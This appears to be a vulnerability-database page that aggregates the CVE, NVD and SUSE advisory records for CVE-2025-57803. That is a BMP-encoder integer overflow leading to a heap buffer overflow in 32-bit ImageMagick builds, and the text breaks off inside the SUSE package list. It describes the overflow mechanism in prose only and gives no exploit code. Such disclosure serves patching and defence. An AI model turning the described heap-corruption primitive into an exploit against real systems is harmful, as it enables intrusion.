Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-57803 (GCVE-0-2025-57803)
Vulnerability from cvelistv5
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ImageMagick | ImageMagick |
Version: < 7.1.2-2 Version: < 6.9.13-28 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-57803",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-23T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-24T03:55:18.713Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "ImageMagick",
"vendor": "ImageMagick",
"versions": [
{
"status": "affected",
"version": "\u003c 7.1.2-2"
},
{
"status": "affected",
"version": "\u003c 6.9.13-28"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-28 and 7.1.2-2 for ImageMagick\u0027s 32-bit build, a 32-bit integer overflow in the BMP encoder\u2019s scanline-stride computation collapses bytes_per_line (stride) to a tiny value while the per-row writer still emits 3 \u00d7 width bytes for 24-bpp images. The row base pointer advances using the (overflowed) stride, so the first row immediately writes past its slot and into adjacent heap memory with attacker-controlled bytes. This is a classic, powerful primitive for heap corruption in common auto-convert pipelines. This issue has been patched in versions 6.9.13-28 and 7.1.2-2."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-122",
"description": "CWE-122: Heap-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-190",
"description": "CWE-190: Integer Overflow or Wraparound",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-26T17:25:59.148Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm"
},
{
"name": "https://github.com/ImageMagick/ImageMagick/commit/2c55221f4d38193adcb51056c14cf238fbcc35d7",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/2c55221f4d38193adcb51056c14cf238fbcc35d7"
},
{
"name": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1"
}
],
"source": {
"advisory": "GHSA-mxvv-97wh-cfmm",
"discovery": "UNKNOWN"
},
"title": "ImageMagick (WriteBMPImage): 32-bit integer overflow when writing BMP scanline stride \u2192 heap buffer overflow"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-57803",
"datePublished": "2025-08-26T17:25:59.148Z",
"dateReserved": "2025-08-20T14:30:35.009Z",
"dateUpdated": "2025-10-24T03:55:18.713Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-57803\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-08-26T18:15:47.780\",\"lastModified\":\"2025-09-02T18:10:29.920\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-28 and 7.1.2-2 for ImageMagick\u0027s 32-bit build, a 32-bit integer overflow in the BMP encoder\u2019s scanline-stride computation collapses bytes_per_line (stride) to a tiny value while the per-row writer still emits 3 \u00d7 width bytes for 24-bpp images. The row base pointer advances using the (overflowed) stride, so the first row immediately writes past its slot and into adjacent heap memory with attacker-controlled bytes. This is a classic, powerful primitive for heap corruption in common auto-convert pipelines. This issue has been patched in versions 6.9.13-28 and 7.1.2-2.\"},{\"lang\":\"es\",\"value\":\"ImageMagick es un software gratuito y de c\u00f3digo abierto que se utiliza para editar y manipular im\u00e1genes digitales. Antes de las versiones 6.9.13-28 y 7.1.2-2 de la compilaci\u00f3n de 32 bits de ImageMagick, un desbordamiento de entero de 32 bits en el c\u00e1lculo del paso de l\u00ednea de escaneo del codificador BMP reduc\u00eda el valor de bytes_per_line (paso) a un valor min\u00fasculo, mientras que el escritor por fila segu\u00eda emitiendo 3 bytes de ancho para im\u00e1genes de 24 bpp. El puntero de base de fila avanza utilizando el paso (desbordado), por lo que la primera fila escribe inmediatamente m\u00e1s all\u00e1 de su ranura y en la memoria del mont\u00f3n adyacente con bytes controlados por el atacante. Esta es una primitiva cl\u00e1sica y potente para la corrupci\u00f3n del mont\u00f3n en las canalizaciones de autoconversi\u00f3n comunes. Este problema se ha corregido en las versiones 6.9.13-28 y 7.1.2-2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.6,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-122\"},{\"lang\":\"en\",\"value\":\"CWE-190\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"6.9.13-28\",\"matchCriteriaId\":\"B123C6EB-CD31-49C5-96C3-41A560B87CD5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"7.0.0-0\",\"versionEndExcluding\":\"7.1.2-2\",\"matchCriteriaId\":\"84949254-D128-4390-9EBB-74CE243F85BB\"}]}]}],\"references\":[{\"url\":\"https://github.com/ImageMagick/ImageMagick/commit/2c55221f4d38193adcb51056c14cf238fbcc35d7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-57803\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-08-26T20:35:13.534316Z\"}}}], \"references\": [{\"url\": \"https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-08-26T20:35:08.436Z\"}}], \"cna\": {\"title\": \"ImageMagick (WriteBMPImage): 32-bit integer overflow when writing BMP scanline stride \\u2192 heap buffer overflow\", \"source\": {\"advisory\": \"GHSA-mxvv-97wh-cfmm\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"ImageMagick\", \"product\": \"ImageMagick\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 7.1.2-2\"}, {\"status\": \"affected\", \"version\": \"\u003c 6.9.13-28\"}]}], \"references\": [{\"url\": \"https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm\", \"name\": \"https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/ImageMagick/ImageMagick/commit/2c55221f4d38193adcb51056c14cf238fbcc35d7\", \"name\": \"https://github.com/ImageMagick/ImageMagick/commit/2c55221f4d38193adcb51056c14cf238fbcc35d7\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1\", \"name\": \"https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-28 and 7.1.2-2 for ImageMagick\u0027s 32-bit build, a 32-bit integer overflow in the BMP encoder\\u2019s scanline-stride computation collapses bytes_per_line (stride) to a tiny value while the per-row writer still emits 3 \\u00d7 width bytes for 24-bpp images. The row base pointer advances using the (overflowed) stride, so the first row immediately writes past its slot and into adjacent heap memory with attacker-controlled bytes. This is a classic, powerful primitive for heap corruption in common auto-convert pipelines. This issue has been patched in versions 6.9.13-28 and 7.1.2-2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-122\", \"description\": \"CWE-122: Heap-based Buffer Overflow\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-190\", \"description\": \"CWE-190: Integer Overflow or Wraparound\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-08-26T17:25:59.148Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-57803\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-10-24T03:55:18.713Z\", \"dateReserved\": \"2025-08-20T14:30:35.009Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-08-26T17:25:59.148Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
fkie_cve-2025-57803
Vulnerability from fkie_nvd
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/ImageMagick/ImageMagick/commit/2c55221f4d38193adcb51056c14cf238fbcc35d7 | Patch | |
| security-advisories@github.com | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm | Exploit, Vendor Advisory | |
| security-advisories@github.com | https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1 | Release Notes | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm | Exploit, Vendor Advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| imagemagick | imagemagick | * | |
| imagemagick | imagemagick | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B123C6EB-CD31-49C5-96C3-41A560B87CD5",
"versionEndExcluding": "6.9.13-28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "84949254-D128-4390-9EBB-74CE243F85BB",
"versionEndExcluding": "7.1.2-2",
"versionStartIncluding": "7.0.0-0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-28 and 7.1.2-2 for ImageMagick\u0027s 32-bit build, a 32-bit integer overflow in the BMP encoder\u2019s scanline-stride computation collapses bytes_per_line (stride) to a tiny value while the per-row writer still emits 3 \u00d7 width bytes for 24-bpp images. The row base pointer advances using the (overflowed) stride, so the first row immediately writes past its slot and into adjacent heap memory with attacker-controlled bytes. This is a classic, powerful primitive for heap corruption in common auto-convert pipelines. This issue has been patched in versions 6.9.13-28 and 7.1.2-2."
},
{
"lang": "es",
"value": "ImageMagick es un software gratuito y de c\u00f3digo abierto que se utiliza para editar y manipular im\u00e1genes digitales. Antes de las versiones 6.9.13-28 y 7.1.2-2 de la compilaci\u00f3n de 32 bits de ImageMagick, un desbordamiento de entero de 32 bits en el c\u00e1lculo del paso de l\u00ednea de escaneo del codificador BMP reduc\u00eda el valor de bytes_per_line (paso) a un valor min\u00fasculo, mientras que el escritor por fila segu\u00eda emitiendo 3 bytes de ancho para im\u00e1genes de 24 bpp. El puntero de base de fila avanza utilizando el paso (desbordado), por lo que la primera fila escribe inmediatamente m\u00e1s all\u00e1 de su ranura y en la memoria del mont\u00f3n adyacente con bytes controlados por el atacante. Esta es una primitiva cl\u00e1sica y potente para la corrupci\u00f3n del mont\u00f3n en las canalizaciones de autoconversi\u00f3n comunes. Este problema se ha corregido en las versiones 6.9.13-28 y 7.1.2-2."
}
],
"id": "CVE-2025-57803",
"lastModified": "2025-09-02T18:10:29.920",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-08-26T18:15:47.780",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/2c55221f4d38193adcb51056c14cf238fbcc35d7"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-122"
},
{
"lang": "en",
"value": "CWE-190"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
suse-su-2025:03151-1
Vulnerability from csaf_suse
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for ImageMagick",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for ImageMagick fixes the following issues:\n\n- CVE-2025-55004: Fixed heap buffer over-read in in ReadOneMNGIMage when processing images with separate alpha channels\n (bsc#1248076).\n- CVE-2025-55005: Fixed heap buffer overflow when transforming from Log to sRGB colorspaces (bsc#1248077).\n- CVE-2025-55154: Fixed integer overflow when performing magnified size calculations in ReadOneMNGIMage (bsc#1248078).\n- CVE-2025-55160: Fixed undefined behavior due to function-type-mismatch in CloneSplayTree (bsc#1248079).\n- CVE-2025-55212: Fixed division-by-zero in ThumbnailImage() when passing a geometry string containing only a colon to\n `montage -geometry` (bsc#1248767).\n- CVE-2025-55298: Fixed heap overflow due to format string bug vulnerability (bsc#1248780).\n- CVE-2025-57803: Fixed heap out-of-bounds (OOB) write due to 32-bit integer overflow (bsc#1248784). \n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-3151,SUSE-SLE-Product-HPC-15-SP3-LTSS-2025-3151,SUSE-SLE-Product-SLES-15-SP3-LTSS-2025-3151,SUSE-SLE-Product-SLES_SAP-15-SP3-2025-3151,SUSE-Storage-7.1-2025-3151",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_03151-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:03151-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-202503151-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:03151-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2025-September/041610.html"
},
{
"category": "self",
"summary": "SUSE Bug 1248076",
"url": "https://bugzilla.suse.com/1248076"
},
{
"category": "self",
"summary": "SUSE Bug 1248077",
"url": "https://bugzilla.suse.com/1248077"
},
{
"category": "self",
"summary": "SUSE Bug 1248078",
"url": "https://bugzilla.suse.com/1248078"
},
{
"category": "self",
"summary": "SUSE Bug 1248079",
"url": "https://bugzilla.suse.com/1248079"
},
{
"category": "self",
"summary": "SUSE Bug 1248767",
"url": "https://bugzilla.suse.com/1248767"
},
{
"category": "self",
"summary": "SUSE Bug 1248780",
"url": "https://bugzilla.suse.com/1248780"
},
{
"category": "self",
"summary": "SUSE Bug 1248784",
"url": "https://bugzilla.suse.com/1248784"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55004 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55004/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55005 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55154 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55160 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55160/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55212 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55212/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55298 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55298/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-57803 page",
"url": "https://www.suse.com/security/cve/CVE-2025-57803/"
}
],
"title": "Security update for ImageMagick",
"tracking": {
"current_release_date": "2025-09-10T18:01:34Z",
"generator": {
"date": "2025-09-10T18:01:34Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:03151-1",
"initial_release_date": "2025-09-10T18:01:34Z",
"revision_history": [
{
"date": "2025-09-10T18:01:34Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"product": {
"name": "ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"product_id": "ImageMagick-7.0.7.34-150200.10.62.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"product": {
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"product_id": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"product": {
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"product_id": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"product": {
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"product_id": "ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.0.7.34-150200.10.62.1.aarch64",
"product": {
"name": "ImageMagick-extra-7.0.7.34-150200.10.62.1.aarch64",
"product_id": "ImageMagick-extra-7.0.7.34-150200.10.62.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"product": {
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"product_id": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"product": {
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"product_id": "libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"product": {
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"product_id": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"product": {
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"product_id": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"product": {
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"product_id": "perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-devel-64bit-7.0.7.34-150200.10.62.1.aarch64_ilp32",
"product": {
"name": "ImageMagick-devel-64bit-7.0.7.34-150200.10.62.1.aarch64_ilp32",
"product_id": "ImageMagick-devel-64bit-7.0.7.34-150200.10.62.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI4-64bit-7.0.7.34-150200.10.62.1.aarch64_ilp32",
"product": {
"name": "libMagick++-7_Q16HDRI4-64bit-7.0.7.34-150200.10.62.1.aarch64_ilp32",
"product_id": "libMagick++-7_Q16HDRI4-64bit-7.0.7.34-150200.10.62.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-64bit-7.0.7.34-150200.10.62.1.aarch64_ilp32",
"product": {
"name": "libMagick++-devel-64bit-7.0.7.34-150200.10.62.1.aarch64_ilp32",
"product_id": "libMagick++-devel-64bit-7.0.7.34-150200.10.62.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI6-64bit-7.0.7.34-150200.10.62.1.aarch64_ilp32",
"product": {
"name": "libMagickCore-7_Q16HDRI6-64bit-7.0.7.34-150200.10.62.1.aarch64_ilp32",
"product_id": "libMagickCore-7_Q16HDRI6-64bit-7.0.7.34-150200.10.62.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI6-64bit-7.0.7.34-150200.10.62.1.aarch64_ilp32",
"product": {
"name": "libMagickWand-7_Q16HDRI6-64bit-7.0.7.34-150200.10.62.1.aarch64_ilp32",
"product_id": "libMagickWand-7_Q16HDRI6-64bit-7.0.7.34-150200.10.62.1.aarch64_ilp32"
}
}
],
"category": "architecture",
"name": "aarch64_ilp32"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.0.7.34-150200.10.62.1.i586",
"product": {
"name": "ImageMagick-7.0.7.34-150200.10.62.1.i586",
"product_id": "ImageMagick-7.0.7.34-150200.10.62.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.i586",
"product": {
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.i586",
"product_id": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.i586",
"product": {
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.i586",
"product_id": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.i586",
"product": {
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.i586",
"product_id": "ImageMagick-devel-7.0.7.34-150200.10.62.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.0.7.34-150200.10.62.1.i586",
"product": {
"name": "ImageMagick-extra-7.0.7.34-150200.10.62.1.i586",
"product_id": "ImageMagick-extra-7.0.7.34-150200.10.62.1.i586"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.i586",
"product": {
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.i586",
"product_id": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.i586"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.i586",
"product": {
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.i586",
"product_id": "libMagick++-devel-7.0.7.34-150200.10.62.1.i586"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.i586",
"product": {
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.i586",
"product_id": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.i586"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.i586",
"product": {
